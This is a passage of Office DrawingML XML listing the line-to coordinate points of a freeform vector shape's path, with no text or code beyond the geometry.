                    <a:pt x="1545" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1551" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560" y="582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1579" y="576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587" y="576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1590" y="572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598" y="572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1602" y="570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1608" y="566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613" y="565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1619" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625" y="559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1628" y="555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1634" y="553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646" y="547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651" y="544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655" y="540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661" y="538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1665" y="532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670" y="528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1684" y="517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1687" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691" y="506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1695" y="502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1699" y="496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703" y="490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1706" y="485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712" y="475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1720" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1725" y="452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1729" y="447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733" y="441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1739" y="430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741" y="426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744" y="420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748" y="414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1750" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1760" y="393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1762" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1765" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1767" y="378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1771" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1788" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1796" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1801" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1809" y="334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1815" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1822" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838" y="321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1851" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1857" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1864" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1877" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885" y="319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1893" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1898" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1904" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1915" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1921" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1927" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1934" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1940" y="353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1953" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1976" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1986" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990" y="378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1993" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2005" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2012" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2018" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2060" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2067" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077" y="378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085" y="378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2090" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2106" y="372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2111" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2117" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128" y="365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2138" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144" y="357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155" y="353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2174" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2187" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2193" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2201" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206" y="308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2210" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2223" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2225" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2227" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2231" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2235" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2237" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2237" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2240" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2246" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2242" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2237" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2233" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2227" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2218" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2201" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2191" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2174" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2164" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2159" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2153" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2147" y="91"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2144" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2138" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2134" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2123" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2113" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2107" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2104" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2098" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2094" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2077" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2069" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2062" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2056" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2050" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2047" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2041" y="186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2035" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2026" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2018" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2005" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2001" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1988" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1978" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1971" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1953" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1948" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1934" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1929" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1923" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1914" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1908" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1902" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1896" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1879" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1872" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1866" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1843" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1830" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1824" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1819" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1811" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1798" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1792" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1786" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781" y="129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1767" y="133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1760" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1742" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1731" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1720" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1712" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1706" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703" y="159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1697" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1685" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1676" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1666" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1661" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1659" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1653" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1647" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1644" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1632" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617" y="218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1609" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1604" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1598" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1592" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1587" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1581" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1575" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1560" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1549" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1543" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1537" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520" y="321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1503" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1497" y="334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1492" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1478" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471" y="340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1457" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1450" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1444" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429" y="325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421" y="321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1414" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1406" y="310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398" y="304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1383" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374" y="285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1359" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1349" y="264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1340" y="256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1324" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1315" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1305" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1288" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1281" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258" y="197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1252" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1246" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1237" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1231" y="186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1226" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1222" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1212" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1186" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1180" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1167" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1161" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1155" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1148" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1144" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1136" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1131" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1125" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1119" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1100" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087" y="178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1081" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1075" y="182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062" y="186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049" y="190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037" y="196"/>
                  </a:lnTo>
